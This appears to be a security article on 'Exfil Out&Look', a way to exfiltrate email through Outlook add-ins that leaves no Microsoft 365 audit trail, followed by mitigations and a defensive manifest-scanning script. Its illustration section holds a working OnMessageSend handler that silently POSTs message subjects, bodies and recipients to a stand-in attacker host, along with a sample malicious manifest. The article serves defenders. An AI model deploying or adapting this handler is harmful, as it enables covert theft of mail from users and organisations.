For years, security teams have relied on Microsoft 365 Unified Audit Logs as a foundational control for threat detection, investigations, and compliance. But new research from Varonis Threat Labs reveals a dangerous reality: entire classes of email data exfiltration can occur without leaving any forensic trail.
The attack technique, dubbed “Exfil Out&Look,” abuses Microsoft Outlook add-ins to silently siphon sensitive email content—without triggering standard audit events, even in fully licensed Microsoft 365 E5 environments.
This isn’t malware in the traditional sense.
There’s no exploit chain.
No suspicious binaries.
No alerts.
Just legitimate functionality, quietly weaponized.
In this article, we’ll break down:
- What Exfil Out&Look is and why it matters
- How Outlook add-ins work under the hood
- Where Microsoft 365 visibility breaks down
- Realistic attack scenarios and threat models
- Practical detection, mitigation, and governance strategies
What Is Exfil Out&Look?
Definition and Overview
Exfil Out&Look is a stealthy data exfiltration technique that leverages Microsoft 365 Outlook add-ins to intercept and export email content without generating meaningful audit logs.
The technique targets a fundamental blind spot in Microsoft's monitoring model: add-ins installed and executed through Outlook Web Access (OWA, now branded Outlook on the web) leave no Unified Audit Log record of their installation, their execution, or the data they read.
Unlike phishing or token theft, this attack:
- Uses legitimate Outlook extensibility
- Requires minimal permissions
- Leaves no actionable audit trail for defenders
Understanding Outlook Add-Ins
How Outlook Add-Ins Work
Outlook add-ins are web-based extensions, built using:
- HTML
- CSS
- JavaScript
Each add-in is defined by a manifest (classic XML, or the newer unified JSON manifest), which specifies:
- Required permissions (Restricted, ReadItem, ReadWriteItem, or ReadWriteMailbox)
- Event-based activation hooks (e.g., OnMessageSend, OnNewMessageCompose)
- UI elements and integration points (ribbon buttons, task panes)
- The URLs the add-in code is loaded from (SourceLocation) and the external domains it is allowed to navigate to (AppDomains)
Add-in code runs inside the Outlook client and reads mailbox data through the Office JavaScript API (Office.js); given an access token it can also call Microsoft Graph.
Deployment Models
Outlook add-ins can be deployed in multiple ways:
1. Per-User Deployment
- Installed via Outlook Web Access (OWA)
- Path: My Add-ins → Custom Add-ins → Add from file / Add from URL
- No admin approval required by default, because the default role assignment policy grants end users the My Custom Apps role
2. Tenant-Wide Deployment
- Deployed by Global or Exchange Administrators
- Via Microsoft 365 Admin Center
- Can be fixed for “Everyone”
- Cannot be removed by end users
This flexibility is powerful—but also dangerous when governance is weak.
The Critical Visibility Gap in Microsoft 365
Desktop vs OWA: A Logging Disparity
Varonis researchers identified a stark difference between Outlook platforms:
| Platform | Telemetry Generated |
|---|---|
| Outlook Desktop | Windows Event Viewer logs (Event ID 45) |
| Outlook Web Access (OWA) | No Unified Audit Log entry |
When an add-in is installed via Outlook Desktop, defenders at least get local host telemetry.
When the same add-in is installed via OWA:
- ❌ No Unified Audit Log entry
- ❌ No alert for add-in execution
- ❌ No record of data access or transmission
Even in E5 + Advanced Audit environments.
How Exfil Out&Look Works
Step-by-Step Attack Flow
At its core, Exfil Out&Look uses a minimally permissioned add-in that hooks the OnMessageSend event (the event-based activation hook also referred to as ItemSend or Smart Alerts), so its code runs every time the user sends a message.
Step 1: Add-In Installation
- User uploads a custom manifest via OWA
- Or admin deploys add-in tenant-wide
Step 2: Event Hook Activation
- Add-in triggers on every email send
Step 3: Data Collection
Using only ReadItem / ReadWriteItem permissions, the add-in accesses:
- Email subject
- Body content
- Recipients
- Timestamps
Step 4: Silent Exfiltration
A JavaScript payload:
- Executes a simple `fetch()` call
- Sends data to an attacker-controlled server
- Runs asynchronously and invisibly
No prompts.
No warnings.
No logs.
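To make the four steps concrete, here is an added illustration of what such an OnMessageSend handler looks like. This is not code from the Varonis research or from any real add-in; the handler name `exfilHandler`, the collector URL `https://collector.example/ingest`, and the sample message are invented. The Office.js objects are replaced by constructed stand-ins with the same callback shape so the handler can be executed offline and its wire output inspected.

```javascript
// Added example, not code from Varonis or Microsoft: the shape of an
// OnMessageSend handler that does what the four steps above describe, run here
// against a constructed stand-in for Office.js so it executes offline.
// Assumptions: the handler name "exfilHandler" and the collector URL are invented.

const COLLECTOR_URL = "https://collector.example/ingest"; // attacker-controlled (assumed)

// Office.js returns results through callbacks shaped { status, value, error };
// this wraps one such getAsync call in a Promise.
function officeCall(obj, ...args) {
  return new Promise((resolve, reject) =>
    obj.getAsync(...args, (result) =>
      result.status === "succeeded" ? resolve(result.value) : reject(result.error)));
}

// Step 3: read what ReadItem/ReadWriteItem already grants on the item being composed.
async function collectItem(item) {
  const [subject, to, cc, body] = await Promise.all([
    officeCall(item.subject),
    officeCall(item.to),
    officeCall(item.cc),
    officeCall(item.body, "text"), // Office.CoercionType.Text
  ]);
  return {
    subject,
    recipients: [...to, ...cc].map((r) => r.emailAddress),
    body,
    capturedAt: new Date().toISOString(),
  };
}

// Steps 2 and 4: the function the manifest names in
// <LaunchEvent Type="OnMessageSend" FunctionName="exfilHandler" .../>.
// In a deployed add-in `item` is Office.context.mailbox.item and `send` is the
// global fetch; both are injected here so the example runs without a network.
async function exfilHandler(event, item, send) {
  try {
    const payload = await collectItem(item);
    // Fire-and-forget: the send is never delayed or blocked by the upload,
    // and a failed upload is swallowed, so the user sees nothing either way.
    send(COLLECTOR_URL, {
      method: "POST",
      headers: { "content-type": "application/json" },
      body: JSON.stringify(payload),
    }).catch(() => {});
  } finally {
    // allowEvent: true lets the message go out exactly as the user intended.
    event.completed({ allowEvent: true });
  }
}

// ---- Constructed stand-ins so the handler can be exercised offline ----

// Mimics Office.context.mailbox.item in compose mode (callback shape only).
function fakeItem(fields) {
  const ok = (value) => ({ status: "succeeded", value });
  return {
    subject: { getAsync: (cb) => cb(ok(fields.subject)) },
    to:      { getAsync: (cb) => cb(ok(fields.to)) },
    cc:      { getAsync: (cb) => cb(ok(fields.cc)) },
    body:    { getAsync: (_coercion, cb) => cb(ok(fields.body)) },
  };
}

// Records what the handler would have sent instead of performing a request.
function recordingFetch() {
  const calls = [];
  const send = (url, init) => { calls.push({ url, init }); return Promise.resolve({ ok: true }); };
  return { send, calls };
}

// Constructed sample message (not real data).
const SAMPLE_ITEM = fakeItem({
  subject: "Q3 board deck (confidential)",
  to: [{ displayName: "Alice", emailAddress: "alice@corp.example" }],
  cc: [{ displayName: "Bob", emailAddress: "bob@partner.example" }],
  body: "Draft attached. Please do not forward outside the board.",
});

// Runs the handler once and returns what an observer on the wire would see.
async function demo() {
  const { send, calls } = recordingFetch();
  let allowed = null;
  const event = { completed: (opts) => { allowed = opts.allowEvent; } };
  await exfilHandler(event, SAMPLE_ITEM, send);
  return { allowed, url: calls[0].url, method: calls[0].init.method,
           payload: JSON.parse(calls[0].init.body) };
}

demo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

Two details matter for defenders. The only external artifact is the HTTPS POST to the collector, which is why the network layer is the one place this can still be seen; and `event.completed({ allowEvent: true })` means the send behaves exactly as it would without the add-in, so nothing in the user's experience changes.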
Why This Attack Is So Hard to Detect
Audit Logs Don’t Tell the Story
Varonis analyzed Microsoft 365 audit data during live testing and found:
- Only generic mailbox operations appear, such as:
  - "Created mailbox item"
  - "Accessed mailbox items"
- No indication that:
  - An add-in intercepted the content
  - Data was transmitted externally
  - A script executed on send
From an incident response perspective, this is a forensic dead end.
Real-World Threat Scenarios
Who Can Abuse This Technique?
Exfil Out&Look is especially attractive for:
- Insider threats
- Compromised user accounts
- Abused admin roles
- Malicious or trojanized add-ins
- Supply chain attacks via add-in marketplaces
Because the behavior blends into normal operations, attackers can maintain long-term persistence with minimal risk of detection.
Why This Is a Microsoft 365 Security Blind Spot
Legitimate Feature, Illegitimate Use
From Microsoft’s perspective:
- The add-in behaves as designed
- Permissions are technically valid
- No explicit policy violation occurs
From a defender’s perspective:
- Sensitive data leaves the environment
- No alerts are raised
- No investigation trail exists
This mismatch highlights a broader issue: functionality ≠ security visibility.
Security and Compliance Implications
Risk to Regulated Organizations
For organizations subject to:
- GDPR
- HIPAA
- SOX
- PCI DSS
Silent email exfiltration creates:
- Data breach exposure
- Audit failures
- Regulatory penalties
- Loss of evidentiary integrity
An incident that cannot be reconstructed is often worse than one that can.
Recommended Mitigations and Best Practices
1. Lock Down Add-In Governance
- Disable custom manifest uploads where possible: in Exchange Online, remove the My Custom Apps role (and, where not needed, My Marketplace Apps and My ReadWriteMailbox Apps) from the default role assignment policy
- Restrict who can install add-ins via OWA, and turn off end-user access to the Office Store in the Microsoft 365 admin center org settings unless there is a business need
- Enforce approval workflows for any add-in that is not centrally deployed
2. Review Admin-Deployed Add-Ins Regularly
- Audit:
- Integrated Apps
- Add-ins fixed for “Everyone”
- Associated service principals
3. Monitor Outbound Network Traffic
- Add-in code is loaded from the hosts declared in its manifest, so inspect traffic from:
  - Outlook clients
  - OWA sessions (the user's browser)
- Flag connections to external endpoints that are not declared in any approved add-in manifest
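The review in item 2 and the endpoint allow-listing in item 3 both start from the same artifact: the add-in manifest. The following is an added triage example (not Varonis or Microsoft tooling) that pulls the three indicators this page describes out of a classic XML manifest: the declared permission, any event hook that fires on send, and the domains the client will load from or is allowed to contact, compared against domains the organization already trusts. Both manifests are constructed for the example, `corp.example` is an assumed organization domain, and the regex-based extraction is a deliberate choice to avoid an XML parser dependency (adequate for flagging, not general parsing).

```javascript
// Added example, not Varonis or Microsoft code: triage an Outlook add-in XML
// manifest for the indicators discussed on this page.  Regex on XML is
// deliberate (no parser dependency) and fine for flagging, not for parsing.

// Hooks that run add-in code on every send (Smart Alerts / ItemSend family).
const SEND_HOOKS = new Set(["OnMessageSend", "OnAppointmentSend"]);

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// trustedDomains: suffixes the organization already expects add-in traffic to
// reach (its own hosts, approved vendors).  Anything else is reported.
function scanManifest(xml, trustedDomains = []) {
  const permission =
    (xml.match(/<Permissions>\s*([A-Za-z]+)\s*<\/Permissions>/) || [])[1] || "unknown";

  // Event-based activation hooks (VersionOverrides > ExtensionPoint > LaunchEvent).
  const events = [...xml.matchAll(/<LaunchEvent\b[^>]*\bType="([^"]+)"/g)].map((m) => m[1]);

  // Only URLs the client will actually contact: DefaultValue attributes
  // (SourceLocation, IconUrl, bt:Url, ...) and AppDomain entries.  Namespace
  // declarations are URLs too and are skipped on purpose.
  const urls = [
    ...[...xml.matchAll(/DefaultValue="(https?:\/\/[^"]+)"/g)].map((m) => m[1]),
    ...[...xml.matchAll(/<AppDomain>\s*(https?:\/\/[^<\s]+)\s*<\/AppDomain>/g)].map((m) => m[1]),
  ];
  const domains = [...new Set(urls.map(hostOf).filter(Boolean))];
  const isTrusted = (d) => trustedDomains.some((t) => d === t || d.endsWith("." + t));
  const externalDomains = domains.filter((d) => !isTrusted(d));

  // Permission level is not a useful signal on its own: ReadItem already
  // suffices for this technique.  Risk comes from code-on-send plus somewhere
  // untrusted to send to.
  const sendHook = events.some((e) => SEND_HOOKS.has(e));
  let risk = "low";
  if (sendHook && externalDomains.length) risk = "high";
  else if (sendHook || (permission === "ReadWriteMailbox" && externalDomains.length)) risk = "medium";

  return { permission, events, domains, externalDomains, sendHook, risk };
}

// Constructed manifest (not a real add-in) carrying the indicators above.
const SUSPICIOUS_MANIFEST = `<?xml version="1.0" encoding="UTF-8"?>
<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0"
           xsi:type="MailApp">
  <Id>00000000-0000-0000-0000-000000000000</Id>
  <DisplayName DefaultValue="Signature Helper"/>
  <IconUrl DefaultValue="https://addin.collector.example/icon.png"/>
  <AppDomains><AppDomain>https://collector.example</AppDomain></AppDomains>
  <Permissions>ReadWriteItem</Permissions>
  <VersionOverrides xmlns="http://schemas.microsoft.com/office/mailappversionoverrides/1.1" xsi:type="VersionOverridesV1_1">
    <ExtensionPoint xsi:type="LaunchEvent">
      <LaunchEvents>
        <LaunchEvent Type="OnMessageSend" FunctionName="exfilHandler" SendMode="PromptUser"/>
      </LaunchEvents>
      <SourceLocation resid="Runtime.Url"/>
    </ExtensionPoint>
    <Resources>
      <bt:Urls>
        <bt:Url id="Runtime.Url" DefaultValue="https://addin.collector.example/launch.html"/>
      </bt:Urls>
    </Resources>
  </VersionOverrides>
</OfficeApp>`;

// Constructed benign manifest: read-only, no event hooks, hosted internally.
const BENIGN_MANIFEST = `<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1" xsi:type="MailApp">
  <DisplayName DefaultValue="Ticket Lookup"/>
  <IconUrl DefaultValue="https://apps.corp.example/ticket/icon.png"/>
  <Permissions>ReadItem</Permissions>
  <SourceLocation DefaultValue="https://apps.corp.example/ticket/index.html"/>
</OfficeApp>`;

function demo() {
  const trusted = ["corp.example"]; // assumed: the organization's own hosts
  return {
    suspicious: scanManifest(SUSPICIOUS_MANIFEST, trusted),
    benign: scanManifest(BENIGN_MANIFEST, trusted),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run this over every manifest deployed to the tenant (the ManifestXml property returned by Get-App -OrganizationApp in Exchange Online PowerShell is one source) and over any custom manifests users have uploaded. The union of the reported `domains` across approved add-ins is also the allow-list against which outbound traffic from Outlook clients and OWA sessions can be compared.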
4. Strengthen Privileged Access Controls
- Limit Global and Exchange Admin roles
- Apply just-in-time (JIT) access
- Monitor role abuse patterns
What Microsoft Needs to Fix
Varonis researchers strongly recommend that Microsoft introduce:
- Comprehensive audit logging for:
- Add-in installation
- Add-in execution
- Sensitive event hooks
- Risk-based add-in classification
- Stronger consent and warning mechanisms
Without these changes, this remains a zero-trace exfiltration vector.
Frequently Asked Questions (FAQs)
What is Exfil Out&Look?
Exfil Out&Look is a stealthy attack technique that uses Outlook add-ins to exfiltrate email data without triggering Microsoft 365 audit logs.
Does this affect Microsoft 365 E5 customers?
Yes. The technique works even in fully licensed E5 environments with Advanced Audit enabled.
Is this malware?
No. It uses legitimate Outlook extensibility features and standard permissions.
Can Microsoft Defender detect this?
Not reliably. The activity blends into normal mailbox operations and lacks specific telemetry.
How can organizations reduce risk?
By restricting add-in installation, auditing admin-deployed add-ins, and monitoring outbound traffic from Outlook clients.
Conclusion
Exfil Out&Look exposes a critical weakness in Microsoft 365 security visibility—one that attackers can exploit using nothing more than sanctioned features and minimal permissions.
For defenders, the lesson is clear:
If you can’t see it, you can’t secure it.
Organizations must treat Outlook add-ins as code execution surfaces, not harmless productivity tools. Until Microsoft closes the audit logging gap, strong governance, role control, and network monitoring are the only effective defenses.
Now is the time to reassess how much trust your environment places in invisible extensibility.